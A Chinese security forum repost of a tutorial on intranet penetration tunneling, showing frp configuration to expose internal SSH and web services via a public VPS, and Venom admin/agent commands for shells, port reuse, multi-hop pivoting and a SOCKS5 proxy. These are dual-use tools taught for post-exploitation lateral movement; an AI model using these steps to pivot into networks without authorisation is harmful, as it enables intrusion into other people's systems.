安全矩阵

 找回密码
 立即注册
搜索
查看: 2574|回复: 0

内网渗透 | 常用的隧道代理技术

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-8-9 09:07:05 | 显示全部楼层 |阅读模式
原文链接:内网渗透 | 常用的隧道代理技术

一、frp 内网穿透https://github.com/fatedier/frp
将内网的服务代理到公网vps中
vps 上配置( frps.ini)
  1. [common]
  2. bind_port = 8005 # 隧道绑定的端口
  3. token = 123456789 # 认证密码
  4. vhost_http_port = 8007 # 内网http服务映射到公网vps上的port
  5. vhost_https_port = 8007 #内网https服务映射到公网vps上的port
复制代码


内网服务(frpc.ini)
  1. [common]
  2. server_addr = vps_ip
  3. server_port = 8005
  4. token = 123456789
复制代码
  1. [ssh]  # 转发内网ssh 转发其他端口也一样 名称无所谓 type = tcp
  2. local_ip = 127.0.0.1
  3. local_port = 22
  4. remote_port = 8006
复制代码

  1. [web] # 转发内网 http custom_domains = vps_ip
  2. type = http
  3. local_port = 80
复制代码


vps 上执行
./frps -c frps.ini

客户端
./frpc -c frpc.ini

ssh 连接 vps对应ssh端口

web 服务
(内)

(外)

二、Venom项目地址 https://github.com/Dliv3/Venom
基本使用

  1. #admin端
  2. admin -lport 8888
  3. #客户端
  4. agent -rhost ip -rport 8888
复制代码



  1. show # 查看已连接的shell。(包含拓扑
  2. goto  1 # 序号
  3. shell # 进行连接shell
复制代码

端口复用
在其他端口不开放的情况下 可以端口复用
  1. #windows下 ip为执行命令的ip
  2. agent.exe -lhost ip -reuse-port 80
  3. #监听
  4. admin.exe -rhost ip -port 80
复制代码




多级代理
起一个admin (Mac os 192.168.0.127)
./admin_macos_x64 -lport 8888
再启动一个agent (Windows。192.168.0.157) 连接admin
./agent.exe -rhost 192.168.0.127 -rport 8888

下层网络启动 agent (windows 下的虚拟机 192.168.56.105)
./agent_linux_x64 -lport 8888

Admin 下查看show

然后进入 1节点。也就是windows 然后连接虚拟机的agent
goto 1connect 192.168.56.105 8888

最后 goto 2 就是进入了win 的虚拟机里了

sock5代理
在想要代理出流量的节点上执行如下
socks 端口号

执行后会在本地出现一个代理端口为 7777
然后用socks 连接工具连接上即可

这里用proxychains 访问的结果一致

作者:BY,文章来源:http://diego.team/


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 13:36 , Processed in 0.014480 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表